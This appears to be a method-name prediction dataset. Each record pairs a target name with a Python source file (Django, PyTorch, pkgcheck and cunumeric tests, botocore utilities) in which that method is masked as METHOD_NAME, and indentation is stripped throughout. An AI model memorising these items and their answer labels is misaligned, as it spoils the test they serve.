def prepare_actual_row(row):
return tuple(prepareActualValue(cell) for cell in row)
def prepare_expected_row(row):
return tuple(prepareExpectedValue(cell) for cell in row)
def assert_empty_resultset(resultset):
Env.RTestInstance.currEnv.assertEquals(len(resultset.result_set), 0)
# check value of a designated statistic
def assert_statistics(resultset, stat, value):
if stat == "+nodes":
Env.RTestInstance.currEnv.assertEquals(resultset.nodes_created, value)
elif stat == "+relationships":
Env.RTestInstance.currEnv.assertEquals(resultset.relationships_created, value)
elif stat == "-relationships":
Env.RTestInstance.currEnv.assertEquals(resultset.relationships_deleted, value)
elif stat == "+labels":
Env.RTestInstance.currEnv.assertEquals(resultset.labels_added, value)
elif stat == "-labels":
Env.RTestInstance.currEnv.assertEquals(resultset.labels_removed, value)
elif stat == "+properties":
Env.RTestInstance.currEnv.assertEquals(resultset.properties_set, value)
elif stat == "-properties":
Env.RTestInstance.currEnv.assertEquals(resultset.properties_removed, value)
elif stat == "-nodes":
Env.RTestInstance.currEnv.assertEquals(resultset.nodes_deleted, value)
else:
print(stat)
Env.RTestInstance.currEnv.assertTrue(False)
# checks resultset statistics for no graph modifications
def assert_no_modifications(resultset):
Env.RTestInstance.currEnv.assertEquals(sum([resultset.nodes_created, resultset.nodes_deleted,
resultset.properties_set, resultset.relationships_created,
resultset.relationships_deleted]), 0)
def assert_resultset_length(resultset, length):
Env.RTestInstance.currEnv.assertEquals(len(resultset.result_set), length)
def assert_resultsets_equals_in_order(actual, expected):
rowCount = len(expected.rows)
# check amount of rows
assert_resultset_length(actual, rowCount)
for rowIdx in range(rowCount):
actualRow = prepare_actual_row(actual.result_set[rowIdx])
expectedRow = prepare_expected_row(expected.rows[rowIdx])
# compare rows
Env.RTestInstance.currEnv.assertEquals(actualRow, expectedRow)
def assert_resultsets_equals(actual, expected):
# Convert each row to a tuple, and maintain a count of how many times that row appears
actualCtr = Counter(prepare_actual_row(row) for row in actual.result_set)
expectedCtr = Counter(prepare_expected_row(row) for row in expected)
# Validate that the constructed Counters are equal
Env.RTestInstance.currEnv.assertEquals(actualCtr, expectedCtr | null |
get object | from django.http import Http404
from django.utils.functional import cached_property
from django_filters import rest_framework as filters
from django_scopes import scopes_disabled
from rest_framework import viewsets
from pretalx.api.serializers.submission import (
ScheduleListSerializer,
ScheduleSerializer,
SubmissionOrgaSerializer,
SubmissionReviewerSerializer,
SubmissionSerializer,
TagSerializer,
)
from pretalx.schedule.models import Schedule
from pretalx.submission.models import Submission, SubmissionStates, Tag
with scopes_disabled():
class SubmissionFilter(filters.FilterSet):
state = filters.MultipleChoiceFilter(choices=SubmissionStates.get_choices())
class Meta:
model = Submission
fields = ("state", "content_locale", "submission_type")
class SubmissionViewSet(viewsets.ReadOnlyModelViewSet):
serializer_class = SubmissionSerializer
queryset = Submission.objects.none()
lookup_field = "code__iexact"
search_fields = ("title", "speakers__name")
filterset_class = SubmissionFilter
def get_queryset(self):
if self.request._request.path.endswith(
"/talks/"
) or not self.request.user.has_perm(
"orga.view_submissions", self.request.event
):
if (
not self.request.user.has_perm(
"agenda.view_schedule", self.request.event
)
or not self.request.event.current_schedule
):
return Submission.objects.none()
return self.request.event.submissions.filter(
pk__in=self.request.event.current_schedule.talks.filter(
is_visible=True
).values_list("submission_id", flat=True)
)
return self.request.event.submissions.all()
def get_serializer_class(self):
if self.request.user.has_perm("orga.change_submissions", self.request.event):
return SubmissionOrgaSerializer
if self.request.user.has_perm("orga.view_submissions", self.request.event):
return SubmissionReviewerSerializer
return SubmissionSerializer
@cached_property
def serializer_questions(self):
return (self.request.query_params.get("questions") or "").split(",")
def get_serializer(self, *args, **kwargs):
can_view_speakers = self.request.user.has_perm(
"agenda.view_schedule", self.request.event
) or self.request.user.has_perm("orga.view_speakers", self.request.event)
if self.request.query_params.get("anon"):
can_view_speakers = False
return super().get_serializer(
*args,
can_view_speakers=can_view_speakers,
event=self.request.event,
questions=self.serializer_questions,
**kwargs,
)
class ScheduleViewSet(viewsets.ReadOnlyModelViewSet):
serializer_class = ScheduleSerializer
queryset = Schedule.objects.none()
lookup_value_regex = "[^/]+"
def get_serializer_class(self):
if self.action == "list":
return ScheduleListSerializer
return ScheduleSerializer # self.action == 'retrieve'
def METHOD_NAME(self):
schedules = self.get_queryset()
query = self.kwargs.get(self.lookup_field)
if query == "wip":
schedule = schedules.filter(version__isnull=True).first()
else:
if query == "latest" and self.request.event.current_schedule:
query = self.request.event.current_schedule.version
schedule = schedules.filter(version__iexact=query).first()
if not schedule:
raise Http404
return schedule
def get_queryset(self):
qs = self.queryset
is_public = (
self.request.event.is_public
and self.request.event.feature_flags["show_schedule"]
)
current_schedule = (
self.request.event.current_schedule.pk
if self.request.event.current_schedule
else None
)
if self.request.user.has_perm("orga.view_schedule", self.request.event):
return self.request.event.schedules.all()
if is_public:
return self.request.event.schedules.filter(pk=current_schedule)
return qs
class TagViewSet(viewsets.ReadOnlyModelViewSet):
serializer_class = TagSerializer
queryset = Tag.objects.none()
lookup_field = "tag__iexact"
def get_queryset(self):
if self.request.user.has_perm("orga.view_submissions", self.request.event):
return self.request.event.tags.all()
return Tag.objects.none() | null |
test | """Implementation of the model used for the FEMNIST experiments."""
from logging import INFO
from typing import Optional, Tuple
import torch
import torch.nn as nn
from flwr.common.logger import log
from torch import Tensor
from torch.utils.data import DataLoader
class Net(nn.Module):
"""Implementation of the model used in the LEAF paper for training on
FEMNIST data."""
# pylint: disable=too-many-instance-attributes
def __init__(self, num_classes: int) -> None:
super().__init__()
self.conv1 = nn.Conv2d(1, 32, kernel_size=5, padding="same")
self.relu1 = nn.ReLU()
self.pool1 = nn.MaxPool2d(kernel_size=2, stride=2)
self.conv2 = nn.Conv2d(32, 64, kernel_size=5, padding="same")
self.relu2 = nn.ReLU()
self.pool2 = nn.MaxPool2d(kernel_size=2, stride=2)
self.fc1 = nn.Linear(7 * 7 * 64, 2048)
self.relu3 = nn.ReLU()
self.fc2 = nn.Linear(2048, num_classes)
def forward(self, x: Tensor) -> Tensor:
"""Forward step in training."""
x = self.conv1(x)
x = self.relu1(x)
x = self.pool1(x)
x = self.conv2(x)
x = self.relu2(x)
x = self.pool2(x)
x = x.view(-1, 7 * 7 * 64)
x = self.fc1(x)
x = self.relu3(x)
x = self.fc2(x)
return x
# pylint: disable=too-many-arguments, too-many-locals, too-many-branches
def train(
net: nn.Module,
trainloader: DataLoader,
valloader: DataLoader,
epochs: Optional[int],
learning_rate: float,
device: torch.device,
n_batches: Optional[int] = None,
verbose: bool = False,
) -> Tuple[float, float, Optional[float], Optional[float]]:
"""Train a given model with CrossEntropy and SGD (or some version of it
like batch-SGD).
n_batches is an alternative way of specifying the training length
(instead of epochs)
"""
criterion = torch.nn.CrossEntropyLoss(reduction="sum")
optimizer = torch.optim.SGD(net.parameters(), lr=learning_rate)
net.train()
epoch_loss, epoch_acc = 0.0, 0.0
# pylint: disable=no-else-return
if epochs:
for epoch in range(epochs):
correct, total, epoch_loss = 0, 0, 0.0
for images, labels in trainloader:
correct, epoch_loss, total = train_step(
correct,
criterion,
device,
epoch_loss,
images,
labels,
net,
optimizer,
total,
)
epoch_loss = epoch_loss / total
epoch_acc = correct / total
if verbose:
log(
INFO,
"Epoch %s: train loss %s, accuracy %s",
str(epoch + 1),
str(epoch_loss),
str(epoch_acc),
)
# Train loss reported is typically the last epoch loss
train_loss, train_acc = epoch_loss, epoch_acc
if len(valloader):
val_loss, val_acc = METHOD_NAME(net, valloader, device)
else:
val_loss, val_acc = None, None
return train_loss, train_acc, val_loss, val_acc
elif n_batches:
# Training time given in number of batches not epochs
correct, total, train_loss = 0, 0, 0.0
for batch_idx, (images, labels) in enumerate(trainloader):
if batch_idx == n_batches:
break
correct, train_loss, total = train_step(
correct,
criterion,
device,
train_loss,
images,
labels,
net,
optimizer,
total,
)
train_acc = correct / total
train_loss = train_loss / total
if verbose:
log(
INFO,
"Batch len based training: train loss %s, accuracy %s",
str(train_loss),
str(train_acc),
)
if len(valloader):
val_loss, val_acc = METHOD_NAME(net, valloader, device)
else:
val_loss, val_acc = None, None
return train_loss, train_acc, val_loss, val_acc
else:
raise ValueError("either n_epochs or n_batches should be specified ")
def train_step(
correct: int,
criterion: nn.CrossEntropyLoss,
device: torch.device,
epoch_loss: float,
images: Tensor,
labels: Tensor,
net: nn.Module,
optimizer: torch.optim.SGD,
total: int,
) -> Tuple[int, float, int]:
"""Single train step.
Returns
-------
correct, epoch_loss, total: Tuple[int, float, int]
number of correctly predicted samples, sum of loss, total number of
samples
"""
images = images.to(device)
labels = labels.to(device)
optimizer.zero_grad()
outputs = net(images)
loss = criterion(outputs, labels)
loss.backward()
optimizer.step()
epoch_loss += loss.item()
total += labels.size(0)
correct += (torch.max(outputs.data, 1)[1] == labels).sum().item()
return correct, float(epoch_loss), total
def METHOD_NAME(
net: nn.Module, dataloader: DataLoader, device: torch.device
) -> Tuple[float, float]:
"""Test - calculate metrics on the given dataloader."""
criterion = torch.nn.CrossEntropyLoss(reduction="sum")
if len(dataloader) == 0:
raise ValueError("Dataloader can't be 0, exiting...")
correct, total, loss = 0, 0, 0.0
net.eval()
with torch.no_grad():
for images, labels in dataloader:
images, labels = images.to(device), labels.to(device)
output = net(images)
loss += criterion(output, labels).item()
_, predicted = output.max(1)
total += labels.size(0)
correct += predicted.eq(labels).sum().item()
accuracy = correct / total
loss /= total
return float(loss), accuracy | null |
test handle | from pathlib import Path
from datetime import date
from io import StringIO
import os
import pytest
import boto3 # noqa
from django.core.management import call_command, CommandError
from django.utils import timezone
from sqlite_utils import Database
from ..models import SiteCheck
from ...accounts import models as ac_models
from ..management.commands.dump_green_domains import GreenDomainExporter
from ..models import GreencheckIp
from . import create_greendomain
def greencheck_sitecheck(
domain, hosting_provider: ac_models.Hostingprovider, green_ip: GreencheckIp
):
return SiteCheck(
url=domain,
ip="192.30.252.153",
data=True,
green=True,
hosting_provider_id=hosting_provider.id,
checked_at=timezone.now(),
match_type="ip",
match_ip_range=green_ip.id,
cached=True,
)
@pytest.fixture
def cleared_test_bucket(object_storage_bucket):
"""
Clears the test bucket. Adds a sanity check in case
we're not using a bucket with test in the name
(better than nothing)
"""
assert "test" in object_storage_bucket.name
[obj.delete() for obj in object_storage_bucket.objects.all() if obj]
return object_storage_bucket
@pytest.fixture
def object_storage_bucket(settings):
session = boto3.Session(region_name=settings.OBJECT_STORAGE_REGION)
object_storage = session.resource(
"s3",
endpoint_url=settings.OBJECT_STORAGE_ENDPOINT,
aws_access_key_id=settings.OBJECT_STORAGE_ACCESS_KEY_ID,
aws_secret_access_key=settings.OBJECT_STORAGE_SECRET_ACCESS_KEY,
)
return object_storage.Bucket(settings.DOMAIN_SNAPSHOT_BUCKET)
class TestGreenDomainExporter:
@pytest.mark.django_db(transaction=True)
def test_dump_green_domains(self, hosting_provider, green_ip, settings):
"""
Test that we can export to sqlite for use in other systems. By default pytest
cases happen inside a transaction for speed, but for this we want to remove
commit the transaction so the external commands in `db-to-sqlite` can see the
test data.
"""
# arrange
exporter = GreenDomainExporter()
sitecheck = greencheck_sitecheck("example.com", hosting_provider, green_ip)
create_greendomain(hosting_provider, sitecheck)
root = Path(settings.ROOT)
today = date.today()
db_path = f"green_urls_{today}.db"
conn_string = exporter.get_conn_string()
# act
exporter.export_to_sqlite(conn_string, db_path)
sqlite_db = Database(db_path)
# do we have our generated db?
Path.exists(root / db_path)
# is the table there?
assert "greendomain" in [table.name for table in sqlite_db.tables]
def test_delete_files(self) -> None:
exporter = GreenDomainExporter()
# Deletion of missing files shouldn't error.
assert exporter.delete_files("/tmp/non-existing.file") is None
fpaths = []
for fname in ("a.txt", "b.txt"):
fpath = f"/tmp/{fname}"
with open(fpath, "w") as fd:
fd.write(fname)
fpaths.append(fpath)
assert exporter.delete_files(*fpaths) is None
# The files must not exist after deletion.
for fpath in fpaths:
assert not Path(fpath).exists(), fpath
with pytest.raises(RuntimeError) as error:
exporter.delete_files("/tmp")
assert 'Failed to remove these files: "/tmp".' in str(error)
@pytest.mark.django_db
class TestDumpGreenDomainCommand:
@staticmethod
def _call_command(**kwargs) -> Path:
stdout = StringIO()
stderr = StringIO()
db_path = Path(f"green_urls_{date.today()}.db")
assert not db_path.exists(), "The DB dump must not exist upon creation."
call_command("dump_green_domains", stdout=stdout, stderr=stderr, **kwargs)
assert not stdout.getvalue()
assert not stderr.getvalue()
return db_path
def METHOD_NAME(self) -> None:
if os.path.exists(f"green_urls_{date.today()}.db"):
os.unlink(f"green_urls_{date.today()}.db")
db_path = self._call_command()
compressed_db_path = Path(f"{db_path}.gz")
assert (
db_path.exists()
), "The DB dump must persist on disk if `--upload` is not supplied."
assert (
not compressed_db_path.exists()
), "The compressed DB dump must not be created when `--upload` is not supplied."
# Add a 'teardown' step to remove the file generated by the test.
# Without this we can't run this test multiple times,
# as a file can be leftover still.
os.unlink(db_path)
@pytest.mark.object_storage
@pytest.mark.smoke_test
def test_handle_with_update(self, cleared_test_bucket, settings, **kwargs) -> None:
"""
Check that this really has uploaded to the bucket we expect it to.
This test also ensures the default `compression_type` is `gzip`.
"""
archive_extension = kwargs.pop("archive_extension", "gz")
db_path = self._call_command(upload=True, **kwargs)
compressed_db_path = Path(f"{db_path}.{archive_extension}")
assert (
not db_path.exists()
), "The DB dump must not persist on disk if `--upload` is supplied."
assert (
not compressed_db_path.exists()
), "The compressed DB dump must not persist on disk if `--upload` is supplied."
def is_uploaded(fname: str) -> bool:
for obj in cleared_test_bucket.objects.all():
if obj.key.endswith(fname):
return True
return False
assert not is_uploaded(
db_path.name
), "The uncompressed DB dump must not be uploaded to object storage."
assert is_uploaded(
compressed_db_path.name
), "The compressed DB dump must be uploaded to object storage."
@pytest.mark.object_storage
@pytest.mark.smoke_test
def test_handle_with_update_and_gzip_compression_type(
self, cleared_test_bucket, settings
) -> None:
self.test_handle_with_update(
cleared_test_bucket,
settings,
compression_type="gzip",
archive_extension="gz",
)
@pytest.mark.object_storage
@pytest.mark.smoke_test
def test_handle_with_update_and_bzip2_compression_type(
self, cleared_test_bucket, settings
) -> None:
self.test_handle_with_update(
cleared_test_bucket,
settings,
compression_type="bzip2",
archive_extension="bz2",
)
@pytest.mark.object_storage
@pytest.mark.smoke_test
def test_handle_with_update_and_invalid_compression_type(
self, cleared_test_bucket, settings
) -> None:
with pytest.raises(CommandError) as error:
self.test_handle_with_update(
cleared_test_bucket,
settings,
compression_type="blah",
archive_extension="b",
)
assert 'The "blah" compression is not supported.' in str(error)
assert 'Use one of "gzip", "bzip2".' in str(error)
| null |
document auto populated param | # Copyright 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import re
from collections import namedtuple
def py_type_name(type_name):
"""Get the Python type name for a given model type.
>>> py_type_name('list')
'list'
>>> py_type_name('structure')
'dict'
:rtype: string
"""
return {
'blob': 'bytes',
'character': 'string',
'double': 'float',
'long': 'integer',
'map': 'dict',
'structure': 'dict',
'timestamp': 'datetime',
}.get(type_name, type_name)
def py_default(type_name):
"""Get the Python default value for a given model type.
>>> py_default('string')
'\'string\''
>>> py_default('list')
'[...]'
>>> py_default('unknown')
'...'
:rtype: string
"""
return {
'double': '123.0',
'long': '123',
'integer': '123',
'string': "'string'",
'blob': "b'bytes'",
'boolean': 'True|False',
'list': '[...]',
'map': '{...}',
'structure': '{...}',
'timestamp': 'datetime(2015, 1, 1)',
}.get(type_name, '...')
def get_official_service_name(service_model):
"""Generate the official name of an AWS Service
:param service_model: The service model representing the service
"""
official_name = service_model.metadata.get('serviceFullName')
short_name = service_model.metadata.get('serviceAbbreviation', '')
if short_name.startswith('Amazon'):
short_name = short_name[7:]
if short_name.startswith('AWS'):
short_name = short_name[4:]
if short_name and short_name.lower() not in official_name.lower():
official_name += f' ({short_name})'
return official_name
_DocumentedShape = namedtuple(
'DocumentedShape',
[
'name',
'type_name',
'documentation',
'metadata',
'members',
'required_members',
],
)
class DocumentedShape(_DocumentedShape):
"""Use this class to inject new shapes into a model for documentation"""
def __new__(
cls,
name,
type_name,
documentation,
metadata=None,
members=None,
required_members=None,
):
if metadata is None:
metadata = []
if members is None:
members = []
if required_members is None:
required_members = []
return super().__new__(
cls,
name,
type_name,
documentation,
metadata,
members,
required_members,
)
class AutoPopulatedParam:
def __init__(self, name, param_description=None):
self.name = name
self.param_description = param_description
if param_description is None:
self.param_description = (
'Please note that this parameter is automatically populated '
'if it is not provided. Including this parameter is not '
'required\n'
)
def METHOD_NAME(self, event_name, section, **kwargs):
"""Documents auto populated parameters
It will remove any required marks for the parameter, remove the
parameter from the example, and add a snippet about the parameter
being autopopulated in the description.
"""
if event_name.startswith('docs.request-params'):
if self.name in section.available_sections:
section = section.get_section(self.name)
if 'is-required' in section.available_sections:
section.delete_section('is-required')
description_section = section.get_section(
'param-documentation'
)
description_section.writeln(self.param_description)
elif event_name.startswith('docs.request-example'):
section = section.get_section('structure-value')
if self.name in section.available_sections:
section.delete_section(self.name)
class HideParamFromOperations:
"""Hides a single parameter from multiple operations.
This method will remove a parameter from documentation and from
examples. This method is typically used for things that are
automatically populated because a user would be unable to provide
a value (e.g., a checksum of a serialized XML request body)."""
def __init__(self, service_name, parameter_name, operation_names):
"""
:type service_name: str
:param service_name: Name of the service to modify.
:type parameter_name: str
:param parameter_name: Name of the parameter to modify.
:type operation_names: list
:param operation_names: Operation names to modify.
"""
self._parameter_name = parameter_name
self._params_events = set()
self._example_events = set()
# Build up the sets of relevant event names.
param_template = 'docs.request-params.%s.%s.complete-section'
example_template = 'docs.request-example.%s.%s.complete-section'
for name in operation_names:
self._params_events.add(param_template % (service_name, name))
self._example_events.add(example_template % (service_name, name))
def hide_param(self, event_name, section, **kwargs):
if event_name in self._example_events:
# Modify the structure value for example events.
section = section.get_section('structure-value')
elif event_name not in self._params_events:
return
if self._parameter_name in section.available_sections:
section.delete_section(self._parameter_name)
class AppendParamDocumentation:
"""Appends documentation to a specific parameter"""
def __init__(self, parameter_name, doc_string):
self._parameter_name = parameter_name
self._doc_string = doc_string
def append_documentation(self, event_name, section, **kwargs):
if self._parameter_name in section.available_sections:
section = section.get_section(self._parameter_name)
description_section = section.get_section('param-documentation')
description_section.writeln(self._doc_string)
_CONTROLS = {
'\n': '\\n',
'\r': '\\r',
'\t': '\\t',
'\b': '\\b',
'\f': '\\f',
}
# Combines all CONTROLS keys into a big or regular expression
_ESCAPE_CONTROLS_RE = re.compile('|'.join(map(re.escape, _CONTROLS)))
# Based on the match get the appropriate replacement from CONTROLS
_CONTROLS_MATCH_HANDLER = lambda match: _CONTROLS[match.group(0)]
def escape_controls(value):
return _ESCAPE_CONTROLS_RE.sub(_CONTROLS_MATCH_HANDLER, value) | null |
test gentoo repo | import pytest
from pkgcheck import checks as checks_mod
from pkgcheck import objects, results
from ..misc import init_check
def test_checks():
"""Scan through all public checks and verify various aspects."""
for name, cls in objects.CHECKS.items():
assert cls.known_results, f"check class {name!r} doesn't define known results"
def test_keywords():
"""Scan through all public result keywords and verify various aspects."""
for name, cls in objects.KEYWORDS.items():
assert cls.level is not None, f"result class {name!r} missing level"
class TestMetadataError:
"""Test MetadataError attribute registry."""
def test_reregister_error(self):
with pytest.raises(ValueError, match="metadata attribute 'eapi' already registered"):
class InvalidEapi2(results.MetadataError, results.VersionResult):
attr = "eapi"
def test_register_missing_attr(self):
with pytest.raises(ValueError, match="class missing metadata attributes"):
class InvalidAttr(results.MetadataError, results.VersionResult):
pass
class TestGentooRepoCheck:
def test_non_gentoo_repo(self, tool, make_repo):
self.repo = make_repo()
args = ["scan", "--repo", self.repo.location]
options, _ = tool.parse_args(args)
with pytest.raises(checks_mod.SkipCheck, match="not running against gentoo repo"):
init_check(checks_mod.GentooRepoCheck, options)
def METHOD_NAME(self, tool, make_repo):
self.repo = make_repo(repo_id="gentoo")
args = ["scan", "--repo", self.repo.location]
options, _ = tool.parse_args(args)
assert init_check(checks_mod.GentooRepoCheck, options)
class TestOverlayCheck:
def test_non_overlay_repo(self, tool, testconfig):
tool.parser.set_defaults(config_path=testconfig)
options, _ = tool.parse_args(["scan", "--repo", "gentoo"])
with pytest.raises(checks_mod.SkipCheck, match="not running against overlay"):
init_check(checks_mod.OverlayRepoCheck, options)
def test_overlay_repo(self, tool, testconfig):
tool.parser.set_defaults(config_path=testconfig)
options, _ = tool.parse_args(["scan", "--repo", "overlay"])
assert init_check(checks_mod.OverlayRepoCheck, options)
class TestGitCommitsCheck:
@pytest.fixture(autouse=True)
def _setup(self, tool, make_repo, make_git_repo):
# initialize parent repo
self.parent_git_repo = make_git_repo()
self.parent_repo = make_repo(self.parent_git_repo.path, repo_id="gentoo", arches=["amd64"])
self.parent_git_repo.add_all("initial commit")
# initialize child repo
self.child_git_repo = make_git_repo()
self.child_git_repo.run(["git", "remote", "add", "origin", self.parent_git_repo.path])
self.child_git_repo.run(["git", "pull", "origin", "main"])
self.child_git_repo.run(["git", "remote", "set-head", "origin", "main"])
self.child_repo = make_repo(self.child_git_repo.path)
def test_no_commits_option(self, tool, make_git_repo):
options, _ = tool.parse_args(["scan", "--repo", self.child_repo.location])
with pytest.raises(checks_mod.SkipCheck, match="not scanning against git commits"):
init_check(checks_mod.GitCommitsCheck, options)
def test_commits_option(self, tool, make_repo):
self.child_repo.create_ebuild("cat/pkg-1")
self.child_git_repo.add_all("cat/pkg-1")
options, _ = tool.parse_args(["scan", "--repo", self.child_repo.location, "--commits"])
assert init_check(checks_mod.GitCommitsCheck, options)
def test_no_local_commits(self, tool):
with pytest.raises(SystemExit) as excinfo:
tool.parse_args(["scan", "--repo", self.child_repo.location, "--commits"])
assert excinfo.value.code == 0
# parent repo has new commits
self.parent_repo.create_ebuild("cat/pkg-1")
self.parent_git_repo.add_all("cat/pkg-1")
self.child_git_repo.run(["git", "pull", "origin", "main"])
with pytest.raises(SystemExit) as excinfo:
tool.parse_args(["scan", "--repo", self.child_repo.location, "--commits"])
assert excinfo.value.code == 0
class TestNetworkCheck:
def test_network_disabled(self, tool):
options, _ = tool.parse_args(["scan"])
with pytest.raises(checks_mod.SkipCheck, match="network checks not enabled"):
init_check(checks_mod.NetworkCheck, options)
def test_network_enabled(self, tool):
options, _ = tool.parse_args(["scan", "--net"])
assert init_check(checks_mod.NetworkCheck, options) | null |
test creation bad type | # Copyright 2021-2022 NVIDIA Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from itertools import product
import numpy as np
import pytest
import cunumeric as num
def test_array():
x = num.array([1, 2, 3])
y = np.array([1, 2, 3])
z = num.array(y)
assert np.array_equal(x, z)
assert x.dtype == z.dtype
x = num.array([1, 2, 3])
y = num.array(x)
assert num.array_equal(x, y)
assert x.dtype == y.dtype
CREATION_FUNCTIONS = ("zeros", "ones")
FILLED_VALUES = [0, 1, 1000, 123.456]
SIZES = (0, 1, 2)
NDIMS = 5
DTYPES = (np.uint32, np.int32, np.float64, np.complex128)
def test_empty():
par = (SIZES, range(NDIMS), DTYPES)
for size, ndims, dtype in product(*par):
shape = ndims * [size]
xf = num.empty(shape, dtype=dtype)
yf = np.empty(shape, dtype=dtype)
assert xf.shape == yf.shape
assert xf.dtype == yf.dtype
@pytest.mark.parametrize("fn", CREATION_FUNCTIONS)
def test_creation_func(fn):
num_f = getattr(num, fn)
np_f = getattr(np, fn)
par = (SIZES, range(NDIMS), DTYPES)
for size, ndims, dtype in product(*par):
shape = ndims * [size]
xf = num_f(shape, dtype=dtype)
yf = np_f(shape, dtype=dtype)
assert np.array_equal(xf, yf)
assert xf.dtype == yf.dtype
@pytest.mark.parametrize("value", FILLED_VALUES)
def test_full(value):
par = (SIZES, range(NDIMS), DTYPES)
for size, ndims, dtype in product(*par):
shape = ndims * [size]
xf = num.full(shape, value, dtype=dtype)
yf = np.full(shape, value, dtype=dtype)
assert np.array_equal(xf, yf)
assert xf.dtype == yf.dtype
SHAPES_NEGATIVE = [
-1,
(-1, 2, 3),
np.array([2, -3, 4]),
]
class TestCreationErrors:
def setup_method(self):
self.bad_type_shape = (2, 3.0)
@pytest.mark.parametrize("shape", SHAPES_NEGATIVE, ids=str)
class TestNegativeShape:
@pytest.mark.parametrize("fn", ("empty", "zeros", "ones"))
def test_creation(self, shape, fn):
with pytest.raises(ValueError):
getattr(num, fn)(shape)
def test_full(self, shape):
with pytest.raises(ValueError):
num.full(shape, 10)
@pytest.mark.parametrize("fn", ("empty", "zeros", "ones"))
def METHOD_NAME(self, fn):
with pytest.raises(TypeError):
getattr(num, fn)(self.bad_type_shape)
def test_full_bad_type(self):
with pytest.raises(TypeError):
num.full(self.bad_type_shape, 10)
# additional special case for full
def test_full_bad_filled_value(self):
with pytest.raises(ValueError):
num.full((2, 3), [10, 20, 30])
DATA_ARGS = [
# Array scalars
(np.array(3.0), None),
(np.array(3), "f8"),
# 1D arrays
(np.array([]), None),
(np.arange(6, dtype="f4"), None),
(np.arange(6), "c16"),
# 2D arrays
(np.array([[]]), None),
(np.arange(6).reshape(2, 3), None),
(np.arange(6).reshape(3, 2), "i1"),
# 3D arrays
(np.array([[[]]]), None),
(np.arange(24).reshape(2, 3, 4), None),
(np.arange(24).reshape(4, 3, 2), "f4"),
]
LIKE_FUNCTIONS = ("zeros_like", "ones_like")
SHAPE_ARG = (None, (-1,), (1, -1))
@pytest.mark.parametrize("x_np,dtype", DATA_ARGS)
@pytest.mark.parametrize("shape", SHAPE_ARG)
def test_empty_like(x_np, dtype, shape):
shape = shape if shape is None else x_np.reshape(shape).shape
x = num.array(x_np)
xfl = num.empty_like(x, dtype=dtype, shape=shape)
yfl = np.empty_like(x_np, dtype=dtype, shape=shape)
assert xfl.shape == yfl.shape
assert xfl.dtype == yfl.dtype
@pytest.mark.parametrize("x_np,dtype", DATA_ARGS)
@pytest.mark.parametrize("fn", LIKE_FUNCTIONS)
@pytest.mark.parametrize("shape", SHAPE_ARG)
def test_func_like(fn, x_np, dtype, shape):
shape = shape if shape is None else x_np.reshape(shape).shape
num_f = getattr(num, fn)
np_f = getattr(np, fn)
x = num.array(x_np)
xfl = num_f(x, dtype=dtype, shape=shape)
yfl = np_f(x_np, dtype=dtype, shape=shape)
assert np.array_equal(xfl, yfl)
assert xfl.dtype == yfl.dtype
@pytest.mark.parametrize("value", FILLED_VALUES)
@pytest.mark.parametrize("x_np, dtype", DATA_ARGS)
@pytest.mark.parametrize("shape", SHAPE_ARG)
def test_full_like(x_np, dtype, value, shape):
shape = shape if shape is None else x_np.reshape(shape).shape
x = num.array(x_np)
xfl = num.full_like(x, value, dtype=dtype, shape=shape)
yfl = np.full_like(x_np, value, dtype=dtype, shape=shape)
assert np.array_equal(xfl, yfl)
assert xfl.dtype == yfl.dtype
def test_full_like_bad_filled_value():
x = num.array([[1, 2, 3], [4, 5, 6]])
with pytest.raises(ValueError):
num.full_like(x, [10, 20, 30])
ARANGE_ARGS = [
(0,),
(10,),
(3.5,),
(3.0, 8, None),
(-10,),
(2, 10),
(2, -10),
(-2.5, 10.0),
(1, -10, -2.5),
(1.0, -10.0, -2.5),
(-10, 10, 10),
(-10, 10, -100),
]
@pytest.mark.parametrize("args", ARANGE_ARGS, ids=str)
def test_arange(args):
x = num.arange(*args)
y = np.arange(*args)
assert np.array_equal(x, y)
assert x.dtype == y.dtype
@pytest.mark.parametrize("dtype", [np.int32, np.float64], ids=str)
@pytest.mark.parametrize("args", ARANGE_ARGS, ids=str)
def test_arange_with_dtype(args, dtype):
x = num.arange(*args, dtype=dtype)
y = np.arange(*args, dtype=dtype)
assert np.array_equal(x, y)
assert x.dtype == y.dtype
ARANGE_ARGS_STEP_ZERO = [
(0, 0, 0),
(0, 10, 0),
(-10, 10, 0),
(1, 10, 0),
(10, -10, 0),
(0.0, 0.0, 0.0),
(0.0, 10.0, 0.0),
(-10.0, 10.0, 0.0),
(1.0, 10.0, 0.0),
(10.0, -10.0, 0.0),
]
class TestArrangeErrors:
def test_inf(self):
with pytest.raises(OverflowError):
num.arange(0, num.inf)
def test_nan(self):
with pytest.raises(ValueError):
num.arange(0, 1, num.nan)
@pytest.mark.parametrize("args", ARANGE_ARGS_STEP_ZERO, ids=str)
def test_zero_division(self, args):
with pytest.raises(ZeroDivisionError):
num.arange(*args)
def test_zero_with_nd_ndarray_shape():
shape = num.array([2, 3, 4])
x = num.zeros(shape)
y = np.zeros(shape)
assert np.array_equal(x, y)
shape = np.array([2, 3, 4])
x = num.zeros(shape)
y = np.zeros(shape)
assert np.array_equal(x, y)
def test_zero_with_0d_ndarray_shape():
shape = num.array(3)
x = num.zeros(shape)
y = np.zeros(shape)
assert np.array_equal(x, y)
shape = np.array(3)
x = num.zeros(shape)
y = np.zeros(shape)
assert np.array_equal(x, y)
if __name__ == "__main__":
import sys
sys.exit(pytest.main(sys.argv)) | null |
rotation2 | # coding: utf-8
# /*##########################################################################
#
# Copyright (C) 2016-2018 European Synchrotron Radiation Facility
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
